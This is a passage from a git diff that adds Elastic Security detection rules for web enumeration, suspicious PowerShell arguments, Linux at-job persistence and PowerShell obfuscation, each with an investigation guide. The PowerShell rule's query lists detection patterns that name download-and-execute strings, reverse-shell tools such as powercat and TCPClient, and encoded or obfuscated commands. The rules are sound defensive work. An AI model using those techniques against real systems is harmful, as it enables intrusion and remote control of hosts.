scanner; if not, disable the job or container, remove any scheduled tasks and API keys used, and notify the owner to stop testing against production immediately.\n- Review the requested path list to identify any 2xx or 401 hits and remediate exposures such as accessible /.env, /.git, /admin interfaces, backup archives, or installer scripts by removing files, disabling endpoints, and rotating secrets.\n- Escalate to incident response if enumeration persists after blocking, pivots to POSTs or credential attempts, originates from rotating IPs (Tor/VPN/residential), or produces 2xx on sensitive endpoints despite WAF rules.\n- Harden the web tier by enabling per-IP rate limiting and bot challenges, turning off directory listing and default app endpoints, blocking patterns like /.git/, /.env, and /backup.zip at the WAF, and restricting origin access to CDN egress only.\n", + "query": "from logs-nginx.access-*, logs-apache.access-*, logs-apache_tomcat.access-*, logs-iis.access-*\n| where\n http.request.method == \"GET\" and \n http.response.status_code in (404, 403)\n\n| eval Esql.url_original_to_lower = to_lower(url.original)\n\n| keep\n @timestamp,\n event.dataset,\n http.request.method,\n http.response.status_code,\n source.ip,\n agent.id,\n host.name,\n Esql.url_original_to_lower,\n data_stream.namespace\n\n| stats\n Esql.event_count = count(),\n Esql.url_original_count_distinct = count_distinct(Esql.url_original_to_lower),\n Esql.host_name_values = values(host.name),\n Esql.agent_id_values = values(agent.id),\n Esql.http_request_method_values = values(http.request.method),\n Esql.http_response_status_code_values = values(http.response.status_code),\n Esql.url_original_values = values(Esql.url_original_to_lower),\n Esql.event_dataset_values = values(event.dataset),\n Esql.data_stream_namespace_values = values(data_stream.namespace)\n by source.ip\n| where\n Esql.event_count > 500 and Esql.url_original_count_distinct > 250\n", + "related_integrations": [ + { + "package": "nginx", + "version": "^2.0.0" + }, + { + "package": "apache", + "version": "^2.0.0" + }, + { + "package": "apache_tomcat", + "version": "^1.9.0" + }, + { + "package": "iis", + "version": "^1.21.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "Esql.agent_id_values", + "type": "keyword" + }, + { + "ecs": false, + "name": "Esql.data_stream_namespace_values", + "type": "keyword" + }, + { + "ecs": false, + "name": "Esql.event_count", + "type": "long" + }, + { + "ecs": false, + "name": "Esql.event_dataset_values", + "type": "keyword" + }, + { + "ecs": false, + "name": "Esql.host_name_values", + "type": "keyword" + }, + { + "ecs": false, + "name": "Esql.http_request_method_values", + "type": "keyword" + }, + { + "ecs": false, + "name": "Esql.http_response_status_code_values", + "type": "long" + }, + { + "ecs": false, + "name": "Esql.url_original_count_distinct", + "type": "long" + }, + { + "ecs": false, + "name": "Esql.url_original_values", + "type": "keyword" + }, + { + "ecs": true, + "name": "source.ip", + "type": "ip" + } + ], + "risk_score": 21, + "rule_id": "8383a8d0-008b-47a5-94e5-496629dc3590", + "severity": "low", + "tags": [ + "Domain: Web", + "Use Case: Threat Detection", + "Tactic: Reconnaissance", + "Data Source: Nginx", + "Data Source: Apache", + "Data Source: Apache Tomcat", + "Data Source: IIS", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0043", + "name": "Reconnaissance", + "reference": "https://attack.mitre.org/tactics/TA0043/" + }, + "technique": [ + { + "id": "T1595", + "name": "Active Scanning", + "reference": "https://attack.mitre.org/techniques/T1595/", + "subtechnique": [ + { + "id": "T1595.002", + "name": "Vulnerability Scanning", + "reference": "https://attack.mitre.org/techniques/T1595/002/" + }, + { + "id": "T1595.003", + "name": "Wordlist Scanning", + "reference": "https://attack.mitre.org/techniques/T1595/003/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "esql", + "version": 2 + }, + "id": "8383a8d0-008b-47a5-94e5-496629dc3590_2", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/83bf249e-4348-47ba-9741-1202a09556ad_210.json b/packages/security_detection_engine/kibana/security_rule/83bf249e-4348-47ba-9741-1202a09556ad_210.json new file mode 100644 index 00000000000..bc29e1bcd23 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/83bf249e-4348-47ba-9741-1202a09556ad_210.json @@ -0,0 +1,139 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the execution of PowerShell with suspicious argument values. This behavior is often observed during malware installation leveraging PowerShell.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.process-*", + "logs-crowdstrike.fdr*", + "logs-m365_defender.event-*", + "logs-sentinel_one_cloud_funnel.*", + "logs-system.security*", + "logs-windows.forwarded*", + "logs-windows.sysmon_operational-*", + "winlogbeat-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious Windows Powershell Arguments", + "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Suspicious Windows Powershell Arguments\n\nPowerShell is a powerful scripting language and command-line shell used for task automation and configuration management in Windows environments. Adversaries exploit PowerShell's capabilities to execute malicious scripts, download payloads, and obfuscate commands. The detection rule identifies unusual PowerShell arguments indicative of such abuse, focusing on patterns like encoded commands, suspicious downloads, and obfuscation techniques, thereby flagging potential threats for further investigation.\n\n### Possible investigation steps\n\n- Review the process command line and arguments to identify any encoded or obfuscated content, such as Base64 strings or unusual character sequences, which may indicate malicious intent.\n- Check the parent process of the PowerShell execution, especially if it is explorer.exe or cmd.exe, to determine if the PowerShell instance was launched from a suspicious or unexpected source.\n- Investigate any network activity associated with the PowerShell process, particularly looking for connections to known malicious domains or IP addresses, or the use of suspicious commands like DownloadFile or DownloadString.\n- Examine the user account associated with the PowerShell execution to determine if it aligns with expected behavior or if it might be compromised.\n- Correlate the event with other security alerts or logs from the same host or user to identify patterns or additional indicators of compromise.\n- Assess the risk and impact of the detected activity by considering the context of the environment, such as the presence of sensitive data or critical systems that might be affected.\n\n### False positive analysis\n\n- Legitimate administrative scripts may use encoded commands for obfuscation to protect sensitive data. Review the script's source and purpose to determine if it is authorized. If confirmed, add the script's hash or specific command pattern to an allowlist.\n- Automated software deployment tools might use PowerShell to download and execute scripts from trusted internal sources. Verify the source and destination of the download. If legitimate, exclude the specific tool or process from the detection rule.\n- System maintenance tasks often involve PowerShell scripts that manipulate files or system settings. Identify routine maintenance scripts and exclude their specific command patterns or file paths from triggering the rule.\n- Security software may use PowerShell for scanning or remediation tasks, which can mimic suspicious behavior. Confirm the software's legitimacy and add its processes to an exception list to prevent false alerts.\n- Developers might use PowerShell for testing or development purposes, which can include obfuscation techniques. Validate the developer's activities and exclude their specific development environments or scripts from the rule.\n\n### Response and remediation\n\n- Immediately isolate the affected system from the network to prevent further spread or communication with potential command and control servers.\n- Terminate any suspicious PowerShell processes identified by the detection rule to halt ongoing malicious activities.\n- Conduct a thorough scan of the affected system using updated antivirus or endpoint detection and response (EDR) tools to identify and remove any malicious payloads or scripts.\n- Review and clean up any unauthorized changes to system configurations or scheduled tasks that may have been altered by the malicious PowerShell activity.\n- Restore any affected files or system components from known good backups to ensure system integrity and functionality.\n- Escalate the incident to the security operations center (SOC) or incident response team for further analysis and to determine if additional systems are compromised.\n- Implement additional monitoring and logging for PowerShell activities across the network to enhance detection of similar threats in the future.", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.name : \"powershell.exe\" and\n\n not (\n ?user.id == \"S-1-5-18\" and\n /* Don't apply the user.id exclusion to Sysmon for compatibility */\n not event.dataset : (\"windows.sysmon_operational\", \"windows.sysmon\")\n ) and\n\n (\n process.command_line : (\n \"*^*^*^*^*^*^*^*^*^*\",\n \"*`*`*`*`*\",\n \"*+*+*+*+*+*+*\",\n \"*[char[]](*)*-join*\",\n \"*Base64String*\",\n \"*[*Convert]*\",\n \"*.Compression.*\",\n \"*-join($*\",\n \"*.replace*\",\n \"*MemoryStream*\",\n \"*WriteAllBytes*\",\n \"* -enc *\",\n \"* -ec *\",\n \"* /e *\",\n \"* /enc *\",\n \"* /ec *\",\n \"*WebClient*\",\n \"*DownloadFile*\",\n \"*DownloadString*\",\n \"* iex*\",\n \"* iwr*\",\n \"* aQB3AHIAIABpA*\",\n \"*Reflection.Assembly*\",\n \"*Assembly.GetType*\",\n \"*$env:temp\\\\*start*\",\n \"*powercat*\",\n \"*nslookup -q=txt*\",\n \"*$host.UI.PromptForCredential*\",\n \"*Net.Sockets.TCPClient*\",\n \"*curl *;Start*\",\n \"powershell.exe \\\"<#*\",\n \"*ssh -p *\",\n \"*http*|iex*\",\n \"*@SSL\\\\DavWWWRoot\\\\*.ps1*\",\n \"*.lnk*.Seek(0x*\",\n \"*[string]::join(*\",\n \"*[Array]::Reverse($*\",\n \"* hidden $(gc *\",\n \"*=wscri& set*\",\n \"*http'+'s://*\",\n \"*.content|i''Ex*\",\n \"*//:sptth*\",\n \"*//:ptth*\",\n \"*h''t''t''p*\",\n \"*'tp'':''/'*\",\n \"*$env:T\\\"E\\\"MP*\",\n \"*;cmd /c $?\",\n \"*s''t''a''r*\",\n \"*$*=Get-Content*AppData*.SubString(*$*\",\n \"*=cat *AppData*.substring(*);*$*\",\n \"*-join'';*|powershell*\",\n \"*.Content;sleep *|powershell*\",\n \"*h\\''t\\''tp:\\''*\",\n \"*-e aQB3AHIAIABp*\",\n \"*iwr *https*).Content*\",\n \"*$env:computername*http*\",\n \"*;InVoKe-ExpRESsIoN $COntent.CONTENt;*\",\n \"*WebClient*example.com*\",\n \"*=iwr $*;iex $*\",\n \"*ServerXmlHttp*IEX*\",\n \"*XmlDocument*IEX*\"\n ) or\n\n (process.args : \"-c\" and process.args : \"&{'*\") or\n\n (process.args : \"-Outfile\" and process.args : \"Start*\") or\n\n (process.args : \"-bxor\" and process.args : \"0x*\") or\n\n process.args : \"$*$*;set-alias\" or\n\n process.args == \"-e\" or\n\n // ATHPowerShellCommandLineParameter\n process.args : (\"-EncodedCommandParamVariation\", \"-UseEncodedArguments\", \"-CommandParamVariation\") or\n\n (\n process.parent.name : (\"explorer.exe\", \"cmd.exe\") and\n process.command_line : (\"*-encodedCommand*\", \"*Invoke-webrequest*\", \"*WebClient*\", \"*Reflection.Assembly*\"))\n )\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^9.0.0" + }, + { + "package": "windows", + "version": "^3.0.0" + }, + { + "package": "system", + "version": "^2.0.0" + }, + { + "package": "sentinel_one_cloud_funnel", + "version": "^1.9.0" + }, + { + "package": "m365_defender", + "version": "^3.0.0" + }, + { + "package": "crowdstrike", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.command_line", + "type": "wildcard" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "83bf249e-4348-47ba-9741-1202a09556ad", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Execution", + "Data Source: Windows Security Event Logs", + "Data Source: Elastic Defend", + "Data Source: Sysmon", + "Data Source: SentinelOne", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: Crowdstrike", + "Data Source: Elastic Endgame", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.001", + "name": "PowerShell", + "reference": "https://attack.mitre.org/techniques/T1059/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 210 + }, + "id": "83bf249e-4348-47ba-9741-1202a09556ad_210", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/84755a05-78c8-4430-8681-89cd6c857d71_6.json b/packages/security_detection_engine/kibana/security_rule/84755a05-78c8-4430-8681-89cd6c857d71_6.json new file mode 100644 index 00000000000..9e3bd864b66 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/84755a05-78c8-4430-8681-89cd6c857d71_6.json @@ -0,0 +1,155 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule monitors for at jobs being created or renamed. Linux at jobs are scheduled tasks that can be leveraged by system administrators to set up scheduled tasks, but may be abused by malicious actors for persistence, privilege escalation and command execution. By creating or modifying cron job configurations, attackers can execute malicious commands or scripts at predefined intervals, ensuring their continued presence and enabling unauthorized activities.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.file*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "At Job Created or Modified", + "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating At Job Created or Modified\n\nThe 'at' command in Linux schedules tasks for future execution, aiding system admins in automating routine jobs. However, attackers can exploit this for persistence, privilege escalation, or executing unauthorized commands. The detection rule identifies suspicious 'at' job creations or modifications by monitoring specific file paths and excluding benign processes, helping to flag potential malicious activities.\n\n### Possible investigation steps\n\n- Review the file path of the created or modified 'at' job to confirm it is within the monitored directory: /var/spool/cron/atjobs/*. Determine if the file path is expected or unusual for the system's typical operations.\n- Identify the process that triggered the alert by examining the process.executable field. Check if the process is known and expected in the context of the system's normal operations.\n- Investigate the user account associated with the process that created or modified the 'at' job. Determine if the account has legitimate reasons to schedule tasks or if it might be compromised.\n- Check the contents of the 'at' job file to understand the commands or scripts scheduled for execution. Look for any suspicious or unauthorized commands that could indicate malicious intent.\n- Correlate the event with other recent alerts or logs from the same host to identify any patterns or additional indicators of compromise, such as privilege escalation attempts or unauthorized access.\n- Verify if there are any known vulnerabilities or exploits associated with the processes or commands involved in the alert, which could provide further context on the potential threat.\n\n### False positive analysis\n\n- System package managers like dpkg, rpm, and yum can trigger false positives when they create or modify at jobs during software installations or updates. To manage this, ensure these processes are included in the exclusion list within the detection rule.\n- Automated system management tools such as Puppet and Chef may also create or modify at jobs as part of their routine operations. Add these tools to the exclusion list to prevent unnecessary alerts.\n- Temporary files with extensions like swp or dpkg-remove can be mistakenly flagged. Exclude these file extensions from the rule to reduce false positives.\n- Processes running from directories like /nix/store or /snap can be benign and should be considered for exclusion if they are part of regular system operations.\n- If the process executable is null, it might indicate a benign system process that lacks a defined executable path. Consider reviewing these cases to determine if they are legitimate and adjust the rule accordingly.\n\n### Response and remediation\n\n- Immediately isolate the affected system from the network to prevent further unauthorized access or execution of malicious tasks.\n- Terminate any suspicious processes associated with the creation or modification of 'at' jobs that are not part of the excluded benign processes.\n- Review and remove any unauthorized 'at' jobs found in the /var/spool/cron/atjobs/ directory to eliminate persistence mechanisms.\n- Conduct a thorough examination of the system for additional indicators of compromise, such as unauthorized user accounts or unexpected network connections.\n- Restore the system from a known good backup if malicious activity is confirmed and cannot be fully remediated.\n- Escalate the incident to the security operations team for further analysis and to determine if additional systems are affected.\n- Implement enhanced monitoring and logging for 'at' job activities to detect similar threats in the future, ensuring that alerts are promptly reviewed and acted upon.", + "query": "file where host.os.type == \"linux\" and event.action in (\"rename\", \"creation\") and\nfile.path like (\"/var/spool/cron/atjobs/*\", \"/var/spool/atjobs/*\") and\nnot (\n process.executable in (\n \"/bin/dpkg\", \"/usr/bin/dpkg\", \"/bin/dockerd\", \"/usr/bin/dockerd\", \"/usr/sbin/dockerd\", \"/bin/microdnf\",\n \"/usr/bin/microdnf\", \"/bin/rpm\", \"/usr/bin/rpm\", \"/bin/snapd\", \"/usr/bin/snapd\", \"/bin/yum\", \"/usr/bin/yum\",\n \"/bin/dnf\", \"/usr/bin/dnf\", \"/bin/podman\", \"/usr/bin/podman\", \"/bin/dnf-automatic\", \"/usr/bin/dnf-automatic\",\n \"/bin/pacman\", \"/usr/bin/pacman\", \"/usr/bin/dpkg-divert\", \"/bin/dpkg-divert\", \"/sbin/apk\", \"/usr/sbin/apk\",\n \"/usr/local/sbin/apk\", \"/usr/bin/apt\", \"/usr/sbin/pacman\", \"/bin/podman\", \"/usr/bin/podman\", \"/usr/bin/puppet\",\n \"/bin/puppet\", \"/opt/puppetlabs/puppet/bin/puppet\", \"/usr/bin/chef-client\", \"/bin/chef-client\",\n \"/bin/autossl_check\", \"/usr/bin/autossl_check\", \"/proc/self/exe\", \"/dev/fd/*\", \"/usr/bin/pamac-daemon\",\n \"/bin/pamac-daemon\", \"/usr/local/bin/dockerd\"\n ) or\n file.extension in (\"swp\", \"swpx\", \"swx\", \"dpkg-remove\") or\n file.Ext.original.extension == \"dpkg-new\" or\n process.executable : (\"/nix/store/*\", \"/var/lib/dpkg/*\", \"/tmp/vmis.*\", \"/snap/*\", \"/dev/fd/*\") or\n process.executable == null or\n (process.name == \"sed\" and file.name : \"sed*\") or\n (process.name == \"perl\" and file.name : \"e2scrub_all.tmp*\")\n)\n", + "references": [ + "https://www.elastic.co/security-labs/primer-on-persistence-mechanisms" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^9.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": false, + "name": "file.Ext.original.extension", + "type": "unknown" + }, + { + "ecs": true, + "name": "file.extension", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "84755a05-78c8-4430-8681-89cd6c857d71", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Privilege Escalation", + "Tactic: Execution", + "Data Source: Elastic Defend", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1053", + "name": "Scheduled Task/Job", + "reference": "https://attack.mitre.org/techniques/T1053/", + "subtechnique": [ + { + "id": "T1053.002", + "name": "At", + "reference": "https://attack.mitre.org/techniques/T1053/002/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1053", + "name": "Scheduled Task/Job", + "reference": "https://attack.mitre.org/techniques/T1053/", + "subtechnique": [ + { + "id": "T1053.002", + "name": "At", + "reference": "https://attack.mitre.org/techniques/T1053/002/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1053", + "name": "Scheduled Task/Job", + "reference": "https://attack.mitre.org/techniques/T1053/", + "subtechnique": [ + { + "id": "T1053.002", + "name": "At", + "reference": "https://attack.mitre.org/techniques/T1053/002/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 6 + }, + "id": "84755a05-78c8-4430-8681-89cd6c857d71_6", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/852c1f19-68e8-43a6-9dce-340771fe1be3_215.json b/packages/security_detection_engine/kibana/security_rule/852c1f19-68e8-43a6-9dce-340771fe1be3_215.json new file mode 100644 index 00000000000..e4a7177c99d --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/852c1f19-68e8-43a6-9dce-340771fe1be3_215.json @@ -0,0 +1,114 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the PowerShell engine being invoked by unexpected processes. Rather than executing PowerShell functionality with powershell.exe, some attackers do this to operate more stealthily.", + "from": "now-9m", + "history_window_start": "now-14d", + "index": [ + "logs-endpoint.events.library-*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Suspicious PowerShell Engine ImageLoad", + "new_terms_fields": [ + "host.id", + "process.executable", + "user.id" + ], + "note": "## Triage and analysis\n\n### Investigating Suspicious PowerShell Engine ImageLoad\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This makes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nAttackers can use PowerShell without having to execute `PowerShell.exe` directly. This technique, often called \"PowerShell without PowerShell,\" works by using the underlying System.Management.Automation namespace and can bypass application allowlisting and PowerShell security features.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate abnormal behaviors observed by the subject process, such as network connections, registry or file modifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe.\n- Retrieve the implementation (DLL, executable, etc.) and determine if it is malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled task creation.\n - Use the PowerShell `Get-FileHash` cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity can happen legitimately. Some vendors have their own PowerShell implementations that are shipped with some products. These benign true positives (B-TPs) can be added as exceptions if necessary after analysis.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "host.os.type:windows and event.category:library and\n dll.name:(\"System.Management.Automation.dll\" or \"System.Management.Automation.ni.dll\") and\n not (\n process.code_signature.subject_name:(\n \"Microsoft Corporation\" or\n \"Microsoft Dynamic Code Publisher\" or\n \"Microsoft Windows\"\n ) and process.code_signature.trusted:true and not process.name.caseless:\"regsvr32.exe\"\n ) and\n not (\n process.executable:(C\\:\\\\Program*Files*\\(x86\\)\\\\*.exe or C\\:\\\\Program*Files\\\\*.exe) and\n process.code_signature.trusted:true\n ) and\n not (\n process.executable: C\\:\\\\Windows\\\\Lenovo\\\\*.exe and process.code_signature.subject_name:\"Lenovo\" and\n process.code_signature.trusted:true\n ) and\n not (\n process.executable: C\\:\\\\Windows\\\\AdminArsenal\\\\PDQInventory-Scanner\\\\service-*\\\\exec\\\\PDQInventoryScanner.exe and\n process.code_signature.subject_name:\"PDQ.com Corporation\" and\n process.code_signature.trusted:true\n ) and\n not (\n process.name: (_is*.exe or \"DellInstaller_x64.exe\") and\n process.code_signature.subject_name:(\"Dell Technologies Inc.\" or \"Dell Inc\" or \"Dell Inc.\") and\n process.code_signature.trusted:true\n ) and\n not (\n process.executable: C\\:\\\\ProgramData\\\\chocolatey\\\\* and\n process.code_signature.subject_name:(\"Chocolatey Software, Inc.\" or \"Chocolatey Software, Inc\") and\n process.code_signature.trusted:true\n ) and\n not (\n process.name: \"Docker Desktop Installer.exe\" and\n process.code_signature.subject_name:\"Docker Inc\" and\n process.code_signature.trusted:true\n ) and\n not process.executable : (\n \"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\" or\n \"C:\\\\Windows\\\\SysWOW64\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\"\n )\n", + "references": [ + "https://www.elastic.co/security-labs/elastic-security-labs-steps-through-the-r77-rootkit" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^9.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "dll.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.code_signature.subject_name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.code_signature.trusted", + "type": "boolean" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": false, + "name": "process.name.caseless", + "type": "unknown" + } + ], + "risk_score": 47, + "rule_id": "852c1f19-68e8-43a6-9dce-340771fe1be3", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Execution", + "Resources: Investigation Guide", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.001", + "name": "PowerShell", + "reference": "https://attack.mitre.org/techniques/T1059/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "new_terms", + "version": 215 + }, + "id": "852c1f19-68e8-43a6-9dce-340771fe1be3_215", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/85e2d45e-a3df-4acf-83d3-21805f564ff4_5.json b/packages/security_detection_engine/kibana/security_rule/85e2d45e-a3df-4acf-83d3-21805f564ff4_5.json new file mode 100644 index 00000000000..b78aaa2d3a0 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/85e2d45e-a3df-4acf-83d3-21805f564ff4_5.json @@ -0,0 +1,168 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies PowerShell scripts that use character arrays and runtime string reconstruction as a form of obfuscation. This technique breaks strings into individual characters, often using constructs like char[] with index-based access or joining logic. These methods are designed to evade static analysis and bypass security protections such as the Antimalware Scan Interface (AMSI).", + "from": "now-9m", + "language": "esql", + "license": "Elastic License v2", + "name": "Potential PowerShell Obfuscation via Character Array Reconstruction", + "note": " ## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Potential PowerShell Obfuscation via Character Array Reconstruction\n\nPowerShell, a powerful scripting language, is often targeted by adversaries for obfuscation to bypass security measures. By reconstructing strings from character arrays, attackers evade static analysis and detection. The detection rule identifies scripts using such obfuscation by searching for patterns indicative of character array manipulation, thus flagging potential threats for further investigation.\n\n### Possible investigation steps\n\n- Review the powershell.file.script_block_text field to understand the content and intent of the script, focusing on the obfuscated parts indicated by the presence of the \"char\" keyword and the \ud83d\udd25 character.\n- Examine the file.path and host.name fields to determine the origin and location of the script execution, which can provide context about the environment and potential risk.\n- Check the user.id and agent.id fields to identify the user and agent responsible for executing the script, which can help assess whether the activity is expected or suspicious.\n- Analyze the powershell.file.script_block_id and powershell.sequence fields to trace the execution sequence and correlate it with other related script blocks, providing a broader view of the script's behavior.\n- Investigate the count field to assess the extent of obfuscation, as a higher count may indicate more complex or extensive obfuscation techniques being used.\n\n### False positive analysis\n\n- Scripts used for legitimate administrative tasks may use character arrays for performance optimization or to handle special characters. Review the script's purpose and context to determine if it aligns with known administrative functions.\n- 